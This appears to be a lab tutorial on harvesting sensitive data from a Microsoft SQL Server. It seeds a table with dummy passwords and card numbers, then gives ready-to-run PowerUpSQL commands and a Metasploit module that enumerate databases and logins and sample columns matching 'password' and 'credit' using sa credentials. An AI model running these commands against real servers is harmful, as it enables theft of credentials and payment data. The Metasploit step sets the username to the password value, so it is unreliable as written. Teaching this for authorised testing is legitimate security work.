In this post you will learn how will can extract sensitive sample information stored in the mssql by using powerupsql and mssql. In our previous article we have mention tools and techniques that can used to enumerate MSSQL Instances.
Table of Contents
Lab setup
PowerupSQL
·
Extracting Database Name
·
Extracting Database Information
·
Extracting Database Login
Metasploit
Lab Setup
Follow the article
for MSSQL Lab Setup and download PowerupSQL from Github. PowerUpSQL
includes functions that support SQL Server discovery, weak configuration
auditing, privilege escalation on scale, and post exploitation actions such as
OS command execution.
In order to enumerate juicy information, let’s create a
database, tables and records.
create database bank;
CREATE TABLE Customers (
CustomerID int,
LastName
varchar(255),
FirstName
varchar(255),
passw
varchar(255),
creditcard
varchar(255)
);
data:image/s3,"s3://crabby-images/bed7b/bed7b21eb1cfe47e021db10d3bb12ee32107e518" alt=""
INSERT INTO Customers(CustomerID, LastName, FirstName,
passw, creditcard)
VALUES ('01', 'Technologies','Ignite', 'admin123',
'1111-2222-3333-4444');
INSERT INTO Customers(CustomerID, LastName, FirstName,
passw, creditcard)
VALUES ('02', 'Sharma','Nisha', 'admin1234',
'5555-6666-7777-8888');
INSERT INTO Customers(CustomerID, LastName, FirstName,
passw, creditcard)
VALUES ('03', 'Chandel','Raj', 'admin12345',
'9999-1010-1020-1030');
INSERT INTO Customers(CustomerID, LastName, FirstName,
passw, creditcard)
VALUES ('04', 'Madan','Geet', 'admin12311',
'1234-5678-9012-3456');
data:image/s3,"s3://crabby-images/f25c9/f25c99390cd810ee81239ca6aea2af5d8eaf407a" alt=""
Extracting
Database Name
You may use the command below to get a list of all SQL
Server databases that are accessible.
Get-SQLDatabaseThreaded -Threads 10 -Username sa -Password
Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -verbose | select
-ExpandProperty DatabaseName
data:image/s3,"s3://crabby-images/7562f/7562fd327a13ddc94eb6dccd5de1f234fd4b503f" alt=""
Extracting
Database Information
The script given below utilises that variable to search all
available SQL Servers for database table column names containing the given
keywords.
Get-SQLColumnSampleDataThreaded -Threads 10 -Keywords
"password, credit" -SampleSize 5 -ValidateCC -NoDefaults -Username sa
-Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Verbose
data:image/s3,"s3://crabby-images/4895c/4895c5a286a2b88b62318a4614dbd37440174955" alt=""
Extracting
Database Login
This module will enumerates SQL Server Logins based on login
id using SUSER_NAME() and only the Public role.
Import-Module .\PowerUpSQL
Get-SQLFuzzServerLogin -Username sa -Password Password@1
-Instance WIN-P83OS778EQK\SQLEXPRESS -verbose
data:image/s3,"s3://crabby-images/9a6b1/9a6b1cbcf57c2c6deaf93ed4c3989a2d565b4127" alt=""
Metasploit
This script will search through
all of the non-default databases on the SQL Server for columns that match the
keywords defined in the TSQL KEYWORDS option. If column names are found that
match the defined keywords and data is present in the associated tables, the
script will select a sample of the records from each of the affected tables.
The sample size is determined by the SAMPLE_SIZE option, and results output in
a CSV format.
use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.46
set username Password@1
set sample_size 4
set keywords FirstName|passw|credit
exploit
0 comments:
Post a Comment